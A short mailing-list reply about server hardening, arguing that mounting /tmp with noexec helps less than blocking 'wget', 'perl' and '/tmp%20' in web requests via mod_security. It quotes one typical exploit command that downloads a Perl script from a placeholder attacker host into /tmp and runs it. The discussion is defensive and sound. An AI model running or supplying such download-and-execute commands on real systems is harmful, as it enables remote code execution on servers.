On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote: > > If possible, make /tmp its own file system and mount it with 'noexec'. > This really helps stop these types of attacks. In fact I would > recommend 'rw,noexec,nosuid,nodev' as the mount options. Of course if > you need to have executables in /tmp then this won't work. :) I used to suggest this too, but to be honest it doesn't work as well as you'd expect. Too many exploit attempts run the eqivilent of: cd /tmp && wget http://evil.example.com/foo.pl perl /tmp/foo.pl & I found blocking "wget", "perl", and "/tmp%20", in requests more productive - using mod_security. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/
Attachment:
signature.asc
Description: Digital signature